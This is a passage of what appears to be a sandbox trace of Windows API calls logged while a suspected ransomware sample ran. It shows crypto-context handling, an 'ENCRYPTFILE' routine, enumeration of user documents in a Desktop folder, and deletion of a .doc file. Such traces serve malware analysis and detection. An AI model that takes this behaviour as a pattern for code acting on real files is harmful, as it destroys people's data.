lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0131.722] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0131.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.722] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0131.722] FreeLibrary (hLibModule=0x756e0000) returned 1 [0131.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0131.723] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.723] CloseHandle (hObject=0x2a0) returned 1 [0131.723] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.723] CloseHandle (hObject=0x258) returned 1 [0131.724] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0131.724] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.724] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc", lpFilePart=0x0) returned 0x38 [0131.724] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\d-agzysfkdtup0q.doc")) returned 0x20 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0131.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0131.725] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fe0ce0, ftCreationTime.dwHighDateTime=0x1d5e9f9, ftLastAccessTime.dwLowDateTime=0x1c3d5830, ftLastAccessTime.dwHighDateTime=0x1d5f006, ftLastWriteTime.dwLowDateTime=0x1c3d5830, ftLastWriteTime.dwHighDateTime=0x1d5f006, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="D-AgzySFKdtUp0Q.doc", cAlternateFileName="D-AGZY~1.DOC")) returned 0x41ac280 [0131.725] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\D-AgzySFKdtUp0Q.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\d-agzysfkdtup0q.doc")) returned 1 [0131.768] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fe0ce0, ftCreationTime.dwHighDateTime=0x1d5e9f9, ftLastAccessTime.dwLowDateTime=0x1c3d5830, ftLastAccessTime.dwHighDateTime=0x1d5f006, ftLastWriteTime.dwLowDateTime=0x1c3d5830, ftLastWriteTime.dwHighDateTime=0x1d5f006, nFileSizeHigh=0x0, nFileSizeLow=0x4c98, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="D-AgzySFKdtUp0Q.doc", cAlternateFileName="D-AGZY~1.DOC")) returned 0 [0131.768] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0131.768] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0131.768] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0131.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43152e0 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0131.769] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0131.769] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0131.769] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0131.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0131.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0131.770] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.770] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0131.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0131.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.771] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb24f7de0, ftCreationTime.dwHighDateTime=0x1d5ea8d, ftLastAccessTime.dwLowDateTime=0xbb1d0940, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xbb1d0940, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x941f, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="dcplTjPjl4z2QV.odp", cAlternateFileName="DCPLTJ~1.ODP")) returned 0x41ac140 [0131.771] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0131.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0131.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0131.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0131.771] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0131.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0131.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0131.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0131.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0131.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0131.772] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0131.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0131.772] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0131.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0131.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0131.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0131.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0131.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0131.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0131.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0131.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0131.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0131.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0131.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0131.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0131.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0131.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0131.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0131.774] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 